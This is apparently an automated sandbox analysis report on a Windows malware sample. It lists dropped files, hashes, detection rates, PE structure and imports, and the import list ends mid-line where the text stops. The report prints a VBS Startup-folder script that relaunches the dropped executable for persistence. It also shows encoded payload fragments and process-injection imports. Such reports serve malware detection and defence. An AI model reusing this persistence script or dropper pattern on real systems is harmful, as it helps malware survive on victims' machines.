Preview:	EA06..2..[z.j..Z.T....A.S..z5..9.V.@.Ej.B....R...6@.Ef......[.G.fc.i..Gw.J%RY.NG..I......0.....].Q\.\..[4.6..+.....#2.B)~..%...wn.v&.X..qk.n$..?.iq.j'...r........]K.$....+F.N,.L..!..!....=?..@(.?/.....`QZ.-D.Ph.....[zU.I.N..}}..T...... ...l.j..!..U.@...eN..~f....t.oF.U':..B.U.V.....7...4.J..I....\|u...$....l......`..:t......~.z....%..Z....}..l.E&..(]...;...x...NjS..g+.I(T.4...3@.C.[.~..C.U.C#.....5..H.T.z..AK..?\|..-....Q(.P.#%J......S...z ...r.M..._h.......D.v.ER}...Uz.j_B.t..).......Z.-_..........f>..{9....:...I...:..J.R.T9P.o.}...c...U,.......XwP.5o.#..\|.zNr...<)..u.....bU.....P...D...Uz..Q..R..........<j.k.).@..].....`f.J.?%Y.]u.nD.z......Su..twUi..7...(...V.Rk.J...D....P....`1...A.S..[..%}.^.6=..=a.j.<;...Y..,:.}...;......'5..w...(...Cc7....O .D.!..5?%p.h@...r-t.R.t.o....l.s.5~...wz.......0....._.Yh...E..?.}...!....j.^.\....-..y..P.....z......*...v..j%c.8.ow......V?uj.{9..e.8.n.E?.D........dm;.\.-^.m.....GZ...5..b....T....Z.T;S.%.

C:\Users\user\AppData\Local\Temp\autEF51.tmp

Download File

Process:	C:\Users\user\Desktop\yqfze5TKW7.exe
File Type:	data
Category:	dropped
Size (bytes):	14754
Entropy (8bit):	7.630906346683391
Encrypted:	false
SSDEEP:	384:pTYznwetWOPrVsiPMmnoGfe01O/e0eGcjxeap3P:pAw4psi0mBe0v53
MD5:	D2319553AF30304F21B0EE3587411ECA
SHA1:	0E420D4E816AF52C89230AAF6EE1EA8CA94C0F5E
SHA-256:	06FB92F813FBBB462DD184A4A1F5A3D88E5922D003215597C5762C45B03BB69E
SHA-512:	A0ADA054F1A40A70DE81CE5E8D996A207C753A53B1DE5B0D1BFE7D307868C7FB14AA5A137677FB75CDE0CB12A897E6469A9868909634BCAB00F39CB0C1C6BC52
Malicious:	false
Reputation:	low
Preview:	EA06..D..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\autF2BB.tmp

Download File

Process:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
File Type:	data
Category:	dropped
Size (bytes):	202230
Entropy (8bit):	7.983442203023768
Encrypted:	false
SSDEEP:	6144:hP6xPkidZQdV21sOsAu+RRix4MqwnUwwBGTu:96xNZekiOZdbix47woGy
MD5:	EFCB79DE624FF58F0EA431E289DB8817
SHA1:	958CBF3F82DD5A8211FB330B1050A04D32C244FF
SHA-256:	76666A80985C1A55F17934E075706B73D7FC046F0F7CF13E98A561FAAEF6F814
SHA-512:	426DBA55A464BCB02CEA9E295DC7E73EA62F43791E1C3B5D82A00CED67B9BCCDFFE908C69C2CE2D6E31FD9068A9C1E1DA945E561F4ADC1746C3F755A5F9FB0EE
Malicious:	false
Reputation:	low
Preview:	EA06..2..[z.j..Z.T....A.S..z5..9.V.@.Ej.B....R...6@.Ef......[.G.fc.i..Gw.J%RY.NG..I......0.....].Q\.\..[4.6..+.....#2.B)~..%...wn.v&.X..qk.n$..?.iq.j'...r........]K.$....+F.N,.L..!..!....=?..@(.?/.....`QZ.-D.Ph.....[zU.I.N..}}..T...... ...l.j..!..U.@...eN..~f....t.oF.U':..B.U.V.....7...4.J..I....\|u...$....l......`..:t......~.z....%..Z....}..l.E&..(]...;...x...NjS..g+.I(T.4...3@.C.[.~..C.U.C#.....5..H.T.z..AK..?\|..-....Q(.P.#%J......S...z ...r.M..._h.......D.v.ER}...Uz.j_B.t..).......Z.-_..........f>..{9....:...I...:..J.R.T9P.o.}...c...U,.......XwP.5o.#..\|.zNr...<)..u.....bU.....P...D...Uz..Q..R..........<j.k.).@..].....`f.J.?%Y.]u.nD.z......Su..twUi..7...(...V.Rk.J...D....P....`1...A.S..[..%}.^.6=..=a.j.<;...Y..,:.}...;......'5..w...(...Cc7....O .D.!..5?%p.h@...r-t.R.t.o....l.s.5~...wz.......0....._.Yh...E..?.}...!....j.^.\....-..y..P.....z......*...v..j%c.8.ow......V?uj.{9..e.8.n.E?.D........dm;.\.-^.m.....GZ...5..b....T....Z.T;S.%.

C:\Users\user\AppData\Local\Temp\autF3D5.tmp

Download File

Process:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
File Type:	data
Category:	dropped
Size (bytes):	14754
Entropy (8bit):	7.630906346683391
Encrypted:	false
SSDEEP:	384:pTYznwetWOPrVsiPMmnoGfe01O/e0eGcjxeap3P:pAw4psi0mBe0v53
MD5:	D2319553AF30304F21B0EE3587411ECA
SHA1:	0E420D4E816AF52C89230AAF6EE1EA8CA94C0F5E
SHA-256:	06FB92F813FBBB462DD184A4A1F5A3D88E5922D003215597C5762C45B03BB69E
SHA-512:	A0ADA054F1A40A70DE81CE5E8D996A207C753A53B1DE5B0D1BFE7D307868C7FB14AA5A137677FB75CDE0CB12A897E6469A9868909634BCAB00F39CB0C1C6BC52
Malicious:	false
Reputation:	low
Preview:	EA06..D..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\beeish

Download File

Process:	C:\Users\user\Desktop\yqfze5TKW7.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	148498
Entropy (8bit):	2.779993438081765
Encrypted:	false
SSDEEP:	192:mNxyGyDZFuipFDtIKMMVQc3GkcVoudfSq5+vLk18NKPWUI/qb35mwBgZ4yJahYEO:l
MD5:	2A4E34D97234A3010B26BE3F93BC72DA
SHA1:	B7D02633077ECA03496A88BAEB272C254EEAFC64
SHA-256:	6A9E44240FF32070BBEA2D93EB954CE450A84666219D178716DCC36580BBCDED
SHA-512:	4975567C01EEB189770628EC0254B8E8428620425BA31ED2525B2D66B363122CCB1655ABEE37A55BE6D97C8495195F0423E93270B7CC2F8E2B90DE8439A9BBBA
Malicious:	false
Preview:	2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

C:\Users\user\AppData\Local\Temp\bothsidedness

Download File

Process:	C:\Users\user\Desktop\yqfze5TKW7.exe
File Type:	data
Category:	dropped
Size (bytes):	209408
Entropy (8bit):	7.825129897747007
Encrypted:	false
SSDEEP:	3072:Gx+0Gv4Wvmz9tUerInqjZQjEq00FJinLOX4M9A26uuFqKmf4oTP3S2AefQYaDjhg:K+0Gv9mz9tjrLNW5ULO4BGVh4YKhg
MD5:	409D46D5D6715958E3B637D378656139
SHA1:	2E8CDCA04DAD082C304B23FD03034762A1BA3225
SHA-256:	C93A662F415E8F8EAA963844365C2DA99AA52AB317C8C3F693E26AFCDED1CE4F
SHA-512:	99EAE81B76E306D698FCF957FC5A02310771868092479CB1993F4B54848A4E0E98E9978CFF6C78854E735BCE03D9BE026FF97BCA79E657775D3ED4029091B7E0
Malicious:	false
Preview:	zm.FW9RZVPWJ..BA.N77FFT9.ZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9.ZRPYU.KB.;...G....2;#w:(%3S#.T'(:V&z05w8/+b(\nsx.f9V6?\|]Z@~EBA2N77.V..~+..{;.;n0.0..98kH.$Y..4q4.?.?.I.7.G`y<.K;.;pb[0.F.8f.)$.!.4.,!).?.IFFT9RZRPWJZEBA2N...T9RZ..WJ.DFAF.7gFFT9RZRP.JyDI@;N7.GFT.SZRPWJu.BA2^77F.U9RZ.PWZZEBC2N27FFT9RZWPWJZEBA2.47FBT9.aPPUJZ.BA"N7'FFT9BZR@WJZEBA"N77FFT9RZRP._XE.A2N7WDF.)SZRPWJZEBA2N77FFT9RZRPWJZE..3N+7FFT9RZRPWJZEBA2N77FFT9RZRP.GXE.A2N77FFT9RZR.VJ.DBA2N77FFT9RZRPWJZEBA2N77FFzM7"&PWJB.CA2^77F.U9R^RPWJZEBA2N77FFt9R:\|"3+.$BA.#77F.U9R4RPW.[EBA2N77FFT9RZ.PW.t!#5SN77.vT9RzPPW\ZEBK0N77FFT9RZRPWJ.EB..<DE%FT9.JSPWXEBS3N7.DFT9RZRPWJZEBArN7wFFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRPWJZEBA2N77FFT9RZRP

C:\Users\user\AppData\Local\underbalance\porcelainization.exe

Download File

Process:	C:\Users\user\Desktop\yqfze5TKW7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1094144
Entropy (8bit):	7.054059949649082
Encrypted:	false
SSDEEP:	24576:bu6J33O0c+JY5UZ+XC0kGso6FaRETYOpPi0wCXAfWY:Vu0c++OCvkGs9FaREEei+XPY
MD5:	30FB530DA7CF794B61893DF575122863
SHA1:	6F2CBEB0861101E7AF3A60016265E28DE876946A
SHA-256:	FB045FEE03DA4085D3999F9FFB0F8CD287EDA8D3842E1C29E156B38B4E28AC76
SHA-512:	D8BBA970010789E4426F7987E3D5C4768F805AA1C181DCCA5A33C4D3E4F14B4126A2E0DF8CA949821028799B391F62F45545D4E9C52D342D16DF540442D8F4FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68% Antivirus: Virustotal, Detection: 49%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...>.Vg.........."..................}............@.......................... ......E.....@...@.......@.....................L...\|....p...).......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....)...p...*..................@..@.reloc...q.......r...@..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Download File

Process:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
File Type:	data
Category:	dropped
Size (bytes):	300
Entropy (8bit):	3.4039370828135396
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclwL1UEZ+lX1QllAcrE81GxsRJAlAnriIM8lfQVn:DsO+vNlwBQ1Qlxr2xoOlGmA2n
MD5:	AECD1CF3F6A91BFE34FB0D77C2172D6F
SHA1:	E03CB9881FEE4B6F986B9FFB60DC4BEC5A1B14E9
SHA-256:	B520CEE2099D04559BBC75ACC4253AF28C2A8EAF785F43CECDDF0D3FAB6B4A9A
SHA-512:	40AE724B803D5B85D5A0DE94FB942AF7689AF40BD4C1CC7524AA4A89F9F448ABCDE95BD614E7CE7722310126FBC8842891D1ADA51771DA153E6B2CCD5752C784
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.u.n.d.e.r.b.a.l.a.n.c.e.\.p.o.r.c.e.l.a.i.n.i.z.a.t.i.o.n...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.054059949649082
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yqfze5TKW7.exe
File size:	1'094'144 bytes
MD5:	30fb530da7cf794b61893df575122863
SHA1:	6f2cbeb0861101e7af3a60016265e28de876946a
SHA256:	fb045fee03da4085d3999f9ffb0f8cd287eda8d3842e1c29e156b38b4e28ac76
SHA512:	d8bba970010789e4426f7987e3d5c4768f805aa1c181dcca5a33c4d3e4f14b4126a2e0df8ca949821028799b391f62f45545d4e9c52d342d16df540442d8f4ff
SSDEEP:	24576:bu6J33O0c+JY5UZ+XC0kGso6FaRETYOpPi0wCXAfWY:Vu0c++OCvkGs9FaREEei+XPY
TLSH:	0635BE2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756D53E [Mon Dec 9 11:32:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FCD8CD79CAAh
jmp 00007FCD8CD6CA74h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FCD8CD6CBFAh
cmp edi, eax
jc 00007FCD8CD6CF5Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FCD8CD6CBF9h
rep movsb
jmp 00007FCD8CD6CF0Ch
cmp ecx, 00000080h
jc 00007FCD8CD6CDC4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FCD8CD6CC00h
bt dword ptr [004BE324h], 01h
jc 00007FCD8CD6D0D0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FCD8CD6CD9Dh
test edi, 00000003h
jne 00007FCD8CD6CDAEh
test esi, 00000003h
jne 00007FCD8CD6CD8Dh
bt edi, 02h
jnc 00007FCD8CD6CBFFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FCD8CD6CC03h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FCD8CD6CC55h
bt esi, 03h
jnc 00007FCD8CD6CCA8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x429f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x429f0	0x42a00	20f514cae648330ad04a785fb363fb3d	False	0.9020689200281425	data	7.831495426464962	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x39cb8	data			1.0003421648474198
RT_GROUP_ICON	0x109470	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1094e8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1094fc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x109510	0x14	data	English	Great Britain	1.25
RT_VERSION	0x109524	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x109600	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, 